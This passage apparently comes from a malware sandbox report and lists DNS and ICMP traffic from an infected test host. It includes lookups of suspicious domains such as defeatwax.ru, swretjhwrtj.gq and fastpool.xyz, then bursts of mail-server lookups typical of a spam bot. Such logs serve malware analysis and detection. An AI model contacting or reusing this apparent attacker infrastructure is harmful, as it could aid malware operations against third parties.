Aug 24, 2021 08:51:10.868593931 CEST	53	59489	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:11.023504019 CEST	52937	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:11.064941883 CEST	53	52937	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:11.111532927 CEST	60008	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:11.153785944 CEST	53	60008	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:11.755490065 CEST	52650	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:11.779860973 CEST	53	52650	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:12.010492086 CEST	57474	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:12.034807920 CEST	53	57474	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:12.876951933 CEST	63140	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:12.904176950 CEST	53	63140	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:14.219654083 CEST	54062	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:14.251679897 CEST	53	54062	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:14.457901955 CEST	63511	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:14.612574100 CEST	53	63511	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:14.667634010 CEST	54602	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:14.702687979 CEST	53	54602	8.8.8.8	192.168.2.5
Aug 24, 2021 08:51:15.339729071 CEST	52886	53	192.168.2.5	8.8.8.8
Aug 24, 2021 08:51:15.373061895 CEST	53	52886	8.8.8.8	192.168.2.5

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 24, 2021 08:50:15.722502947 CEST	192.168.2.5	8.8.8.8	cfee	(Port unreachable)	Destination Unreachable
Aug 24, 2021 08:50:23.075782061 CEST	192.168.2.5	8.8.8.8	cfff	(Port unreachable)	Destination Unreachable
Aug 24, 2021 08:50:44.416642904 CEST	192.168.2.5	8.8.8.8	d02b	(Port unreachable)	Destination Unreachable
Aug 24, 2021 08:51:03.559613943 CEST	192.168.2.5	8.8.8.8	d02b	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 24, 2021 08:48:59.400171041 CEST	192.168.2.5	8.8.8.8	0x58c3	Standard query (0)	readinglistforaugust1.xyz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:48:59.469561100 CEST	192.168.2.5	8.8.8.8	0xb9e2	Standard query (0)	readinglistforaugust2.xyz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:11.417515039 CEST	192.168.2.5	8.8.8.8	0xa4fa	Standard query (0)	readinglistforaugust3.xyz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:20.758805990 CEST	192.168.2.5	8.8.8.8	0x61e0	Standard query (0)	eduarroma.tumblr.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:20.866027117 CEST	192.168.2.5	8.8.8.8	0xeff4	Standard query (0)	swretjhwrtj.gq	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:36.022491932 CEST	192.168.2.5	8.8.8.8	0x3842	Standard query (0)	readinglistforaugust3.xyz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:38.528412104 CEST	192.168.2.5	8.8.8.8	0xddbc	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:38.602909088 CEST	192.168.2.5	8.8.8.8	0xd378	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)
Aug 24, 2021 08:49:57.010579109 CEST	192.168.2.5	8.8.8.8	0xfefa	Standard query (0)	defeatwax.ru	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:07.599773884 CEST	192.168.2.5	8.8.8.8	0x3691	Standard query (0)	telete.in	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.092257977 CEST	192.168.2.5	8.8.8.8	0x29c5	Standard query (0)	msn.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:09.124730110 CEST	192.168.2.5	8.8.8.8	0x571f	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.131568909 CEST	192.168.2.5	8.8.8.8	0xe144	Standard query (0)	hotmail.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:09.166677952 CEST	192.168.2.5	8.8.8.8	0xc0b0	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.181174040 CEST	192.168.2.5	8.8.8.8	0x3279	Standard query (0)	invalid.nl	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:09.197670937 CEST	192.168.2.5	8.8.8.8	0x41cf	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.234802008 CEST	192.168.2.5	8.8.8.8	0x19b2	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.235984087 CEST	192.168.2.5	8.8.8.8	0x2fe5	Standard query (0)	mx.invalid.nl	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.236680031 CEST	192.168.2.5	8.8.8.8	0x2b7a	Standard query (0)	celebslive.net	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:09.301541090 CEST	192.168.2.5	8.8.8.8	0xa42a	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.359869003 CEST	192.168.2.5	8.8.8.8	0xd0cf	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.426819086 CEST	192.168.2.5	8.8.8.8	0xac0	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.474839926 CEST	192.168.2.5	8.8.8.8	0x2025	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.557034969 CEST	192.168.2.5	8.8.8.8	0x1caf	Standard query (0)	mx195.mb5p.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:09.722059011 CEST	192.168.2.5	8.8.8.8	0xb92	Standard query (0)	fastpool.xyz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.055946112 CEST	192.168.2.5	8.8.8.8	0x8dc7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.603543043 CEST	192.168.2.5	8.8.8.8	0x81fd	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:10.676240921 CEST	192.168.2.5	8.8.8.8	0x3dad	Standard query (0)	vyahoo.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:10.884843111 CEST	192.168.2.5	8.8.8.8	0x9595	Standard query (0)	mx37.m1bp.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:11.226069927 CEST	192.168.2.5	8.8.8.8	0xd4b2	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:11.226584911 CEST	192.168.2.5	8.8.8.8	0x371b	Standard query (0)	outlook.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:11.265880108 CEST	192.168.2.5	8.8.8.8	0x87dd	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:11.874800920 CEST	192.168.2.5	8.8.8.8	0x7ecc	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.017765999 CEST	192.168.2.5	8.8.8.8	0xf196	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.168757915 CEST	192.168.2.5	8.8.8.8	0x7627	Standard query (0)	hotm.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:12.242610931 CEST	192.168.2.5	8.8.8.8	0x9ed7	Standard query (0)	mx156.hostedmxserver.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.636878967 CEST	192.168.2.5	8.8.8.8	0xfa3d	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.644144058 CEST	192.168.2.5	8.8.8.8	0xc561	Standard query (0)	live.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:12.707885981 CEST	192.168.2.5	8.8.8.8	0x3248	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:12.980505943 CEST	192.168.2.5	8.8.8.8	0x3c13	Standard query (0)	superdada.it	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:13.035999060 CEST	192.168.2.5	8.8.8.8	0x68	Standard query (0)	mx.powered.name	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.225378036 CEST	192.168.2.5	8.8.8.8	0xdc52	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.462250948 CEST	192.168.2.5	8.8.8.8	0xb11d	Standard query (0)	iinden.gute.se	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:13.557888031 CEST	192.168.2.5	8.8.8.8	0xc0da	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:13.687700033 CEST	192.168.2.5	8.8.8.8	0x1194	Standard query (0)	korea.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:14.700190067 CEST	192.168.2.5	8.8.8.8	0x1194	Standard query (0)	korea.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:14.916646004 CEST	192.168.2.5	8.8.8.8	0xa6d4	Standard query (0)	www.google.co.uk	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:14.996932983 CEST	192.168.2.5	8.8.8.8	0x923d	Standard query (0)	r-smtp6.korea.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:15.002285957 CEST	192.168.2.5	8.8.8.8	0x3f0b	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:15.512718916 CEST	192.168.2.5	8.8.8.8	0x3509	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:15.824651957 CEST	192.168.2.5	8.8.8.8	0xe409	Standard query (0)	consent.google.co.uk	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.162684917 CEST	192.168.2.5	8.8.8.8	0x267c	Standard query (0)	linden.gute.se	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:16.347559929 CEST	192.168.2.5	8.8.8.8	0x6207	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.347811937 CEST	192.168.2.5	8.8.8.8	0x984a	Standard query (0)	mail.h-email.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.420047045 CEST	192.168.2.5	8.8.8.8	0x8f4a	Standard query (0)	www.google.co.uk	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:16.978765011 CEST	192.168.2.5	8.8.8.8	0xd22f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.028800964 CEST	192.168.2.5	8.8.8.8	0x9be3	Standard query (0)	www.instagram.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.577639103 CEST	192.168.2.5	8.8.8.8	0xf2e7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.613912106 CEST	192.168.2.5	8.8.8.8	0x86be	Standard query (0)	live.co.uk	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:17.694844961 CEST	192.168.2.5	8.8.8.8	0x90ba	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:17.905040026 CEST	192.168.2.5	8.8.8.8	0x1c23	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:18.065953970 CEST	192.168.2.5	8.8.8.8	0xe9ab	Standard query (0)	verat.net	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:18.123064995 CEST	192.168.2.5	8.8.8.8	0xeeb8	Standard query (0)	assp.beotel.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:18.128104925 CEST	192.168.2.5	8.8.8.8	0x4aa	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:18.745878935 CEST	192.168.2.5	8.8.8.8	0xc68	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.190143108 CEST	192.168.2.5	8.8.8.8	0x501e	Standard query (0)	ironfox.it	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:19.390793085 CEST	192.168.2.5	8.8.8.8	0xb0c6	Standard query (0)	mail.mailerhost.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:19.394310951 CEST	192.168.2.5	8.8.8.8	0x2b03	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:20.124959946 CEST	192.168.2.5	8.8.8.8	0xa170	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:20.831157923 CEST	192.168.2.5	8.8.8.8	0xbc4d	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:21.502401114 CEST	192.168.2.5	8.8.8.8	0xe753	Standard query (0)	foxmail.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:21.614089012 CEST	192.168.2.5	8.8.8.8	0x6bc	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:21.665292978 CEST	192.168.2.5	8.8.8.8	0xe482	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:21.722748995 CEST	192.168.2.5	8.8.8.8	0xd9e6	Standard query (0)	telkomsa.net	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:23.041064978 CEST	192.168.2.5	8.8.8.8	0x6bc	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.042356968 CEST	192.168.2.5	8.8.8.8	0x5829	Standard query (0)	mail.telkomsa.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.059962988 CEST	192.168.2.5	8.8.8.8	0x26f4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.154593945 CEST	192.168.2.5	8.8.8.8	0xb7b8	Standard query (0)	auth.api.np.ac.playstation.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.289249897 CEST	192.168.2.5	8.8.8.8	0x6df4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.333137035 CEST	192.168.2.5	8.8.8.8	0xc2c0	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.533618927 CEST	192.168.2.5	8.8.8.8	0xd75f	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.735865116 CEST	192.168.2.5	8.8.8.8	0x503d	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.813416958 CEST	192.168.2.5	8.8.8.8	0xbb6e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:23.959321022 CEST	192.168.2.5	8.8.8.8	0x9e12	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.377511978 CEST	192.168.2.5	8.8.8.8	0xbae4	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.465459108 CEST	192.168.2.5	8.8.8.8	0x68a7	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.502216101 CEST	192.168.2.5	8.8.8.8	0xa52b	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.560760975 CEST	192.168.2.5	8.8.8.8	0xb02d	Standard query (0)	seznam.cz	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:24.631071091 CEST	192.168.2.5	8.8.8.8	0x930a	Standard query (0)	mx1.seznam.cz	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:24.900423050 CEST	192.168.2.5	8.8.8.8	0x9dc7	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.050020933 CEST	192.168.2.5	8.8.8.8	0xbee6	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.133255959 CEST	192.168.2.5	8.8.8.8	0x8c54	Standard query (0)	77.52.17.84.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 24, 2021 08:50:25.418519020 CEST	192.168.2.5	8.8.8.8	0x1f84	Standard query (0)	optonline.net	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:25.575556040 CEST	192.168.2.5	8.8.8.8	0x362b	Standard query (0)	mx.optimum.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.581531048 CEST	192.168.2.5	8.8.8.8	0x21dd	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:25.758476019 CEST	192.168.2.5	8.8.8.8	0xcbe2	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.210776091 CEST	192.168.2.5	8.8.8.8	0x964d	Standard query (0)	sotke.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:26.374999046 CEST	192.168.2.5	8.8.8.8	0xaae4	Standard query (0)	sotke.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.378180027 CEST	192.168.2.5	8.8.8.8	0xa19b	Standard query (0)	svitonline.com	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:26.426172018 CEST	192.168.2.5	8.8.8.8	0x795a	Standard query (0)	relay05.kiev.sovam.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.429332972 CEST	192.168.2.5	8.8.8.8	0xd1d5	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.684026957 CEST	192.168.2.5	8.8.8.8	0xba51	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.691909075 CEST	192.168.2.5	8.8.8.8	0x3b18	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:26.872741938 CEST	192.168.2.5	8.8.8.8	0x3557	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:27.251828909 CEST	192.168.2.5	8.8.8.8	0x9f95	Standard query (0)	mail.telkomsa.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:27.389827967 CEST	192.168.2.5	8.8.8.8	0x4b4a	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:27.902877092 CEST	192.168.2.5	8.8.8.8	0x8026	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.413779020 CEST	192.168.2.5	8.8.8.8	0x2055	Standard query (0)	msn-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.420677900 CEST	192.168.2.5	8.8.8.8	0x8154	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.620604038 CEST	192.168.2.5	8.8.8.8	0x6bbe	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.919440985 CEST	192.168.2.5	8.8.8.8	0xab20	Standard query (0)	mx.optimum.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:28.941972017 CEST	192.168.2.5	8.8.8.8	0x2bdd	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.057137966 CEST	192.168.2.5	8.8.8.8	0x9108	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.057187080 CEST	192.168.2.5	8.8.8.8	0x20ba	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.114187956 CEST	192.168.2.5	8.8.8.8	0x9de5	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.233160973 CEST	192.168.2.5	8.8.8.8	0x3b95	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.315186024 CEST	192.168.2.5	8.8.8.8	0xa23b	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.412137032 CEST	192.168.2.5	8.8.8.8	0xfa5c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.559374094 CEST	192.168.2.5	8.8.8.8	0x12a8	Standard query (0)	laposte.net	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:29.617393970 CEST	192.168.2.5	8.8.8.8	0x9da	Standard query (0)	smtpz4.laposte.net	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.870552063 CEST	192.168.2.5	8.8.8.8	0xf71	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:29.900129080 CEST	192.168.2.5	8.8.8.8	0xaf7b	Standard query (0)	hotmail.co.uk	MX (Mail exchange)	IN (0x0001)
Aug 24, 2021 08:50:29.944555998 CEST	192.168.2.5	8.8.8.8	0xb5ba	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.124557972 CEST	192.168.2.5	8.8.8.8	0x37e9	Standard query (0)	outlook-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.373868942 CEST	192.168.2.5	8.8.8.8	0x4094	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.889666080 CEST	192.168.2.5	8.8.8.8	0x839c	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:30.890913963 CEST	192.168.2.5	8.8.8.8	0x553c	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.091092110 CEST	192.168.2.5	8.8.8.8	0xdf40	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.407361984 CEST	192.168.2.5	8.8.8.8	0x2eba	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.595455885 CEST	192.168.2.5	8.8.8.8	0xb918	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.785685062 CEST	192.168.2.5	8.8.8.8	0x2d9d	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.932807922 CEST	192.168.2.5	8.8.8.8	0x3557	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:31.970391989 CEST	192.168.2.5	8.8.8.8	0xf6f2	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.047660112 CEST	192.168.2.5	8.8.8.8	0x3cd0	Standard query (0)	m.youtube.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.199481964 CEST	192.168.2.5	8.8.8.8	0x188b	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.209659100 CEST	192.168.2.5	8.8.8.8	0xde0	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.220057964 CEST	192.168.2.5	8.8.8.8	0xa34e	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.434247017 CEST	192.168.2.5	8.8.8.8	0xe885	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.478622913 CEST	192.168.2.5	8.8.8.8	0xd7f6	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.511399984 CEST	192.168.2.5	8.8.8.8	0x6624	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.698288918 CEST	192.168.2.5	8.8.8.8	0xec6c	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.726190090 CEST	192.168.2.5	8.8.8.8	0xa7dd	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.784117937 CEST	192.168.2.5	8.8.8.8	0x7113	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:32.979613066 CEST	192.168.2.5	8.8.8.8	0x69bd	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.144861937 CEST	192.168.2.5	8.8.8.8	0xf7b9	Standard query (0)	www.google.nl	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.238317013 CEST	192.168.2.5	8.8.8.8	0x1f49	Standard query (0)	eur.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.267563105 CEST	192.168.2.5	8.8.8.8	0x5be2	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.527729034 CEST	192.168.2.5	8.8.8.8	0x8ca5	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.776555061 CEST	192.168.2.5	8.8.8.8	0x9efd	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.902678013 CEST	192.168.2.5	8.8.8.8	0x5ecb	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:33.986948967 CEST	192.168.2.5	8.8.8.8	0x80cd	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.088365078 CEST	192.168.2.5	8.8.8.8	0xdd7f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.183233023 CEST	192.168.2.5	8.8.8.8	0x1ba0	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.261573076 CEST	192.168.2.5	8.8.8.8	0xbd53	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.372997046 CEST	192.168.2.5	8.8.8.8	0xc27f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.448451996 CEST	192.168.2.5	8.8.8.8	0x2dca	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.554095030 CEST	192.168.2.5	8.8.8.8	0xc469	Standard query (0)	live-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.742611885 CEST	192.168.2.5	8.8.8.8	0x51d0	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:34.916769981 CEST	192.168.2.5	8.8.8.8	0x7726	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.081829071 CEST	192.168.2.5	8.8.8.8	0xb25e	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.117022038 CEST	192.168.2.5	8.8.8.8	0x6354	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.312891006 CEST	192.168.2.5	8.8.8.8	0x743f	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.431225061 CEST	192.168.2.5	8.8.8.8	0xf15d	Standard query (0)	mx3.qq.com	A (IP address)	IN (0x0001)
Aug 24, 2021 08:50:35.534604073 CEST	192.168.2.5	8.8.8.8	0x3a2a	Standard query (0)	hotmail-com.olc.protection.outlook.com	A (IP address)	IN (0x0001)
